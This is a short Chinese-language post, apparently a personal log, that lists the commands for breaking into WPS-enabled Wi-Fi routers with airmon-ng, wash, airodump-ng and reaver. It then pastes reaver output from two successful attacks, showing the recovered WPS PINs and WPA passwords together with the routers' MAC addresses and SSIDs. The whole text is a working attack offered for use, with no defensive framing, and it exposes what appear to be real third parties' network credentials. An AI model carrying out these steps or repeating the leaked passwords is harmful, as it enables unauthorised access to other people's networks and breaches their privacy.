airmon-ng start wlan0 #开启监听模式
wash -i mon0 -C #查看所有开启WPS的无线路由长时间无反应按Ctrl+C，结束进程,这时记下你要破解的目标路由MAC.
airodump-ng mon0 #网卡以混杂模式扫描所有频道—并显示所有AP的信息
reaver -i mon0 -b MAC -a -S -vv -c 频道 #可以去睡觉了

一觉醒来

BC:D1:77:F5:63:6A  WPA2 CCMP   PSK  TP-LINK_F5636A
[+] 92.54% complete @ 2014-08-22 23:34:31 (4 seconds/pin)
[+] Max time remaining at this rate: 0:54:44 (821 pins left to try)
[+] Trying pin 36861705
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3068 seconds
[+] WPS PIN: '36861705'
[+] WPA PSK: 'lzy230105'
[+] AP SSID: 'TP-LINK_F5636A'

又攻克一个

[+] Max time remaining at this rate: 0:00:00 (0 pins left to try)
[+] Pin cracked in 7832 seconds
[+] WPS PIN: '17366311'
[+] WPA PSK: 'jialili112358'
[+] AP SSID: 'jialili1001'
9C:21:6A:A6:3A:DE WPA2 CCMP   PSK  jialili1001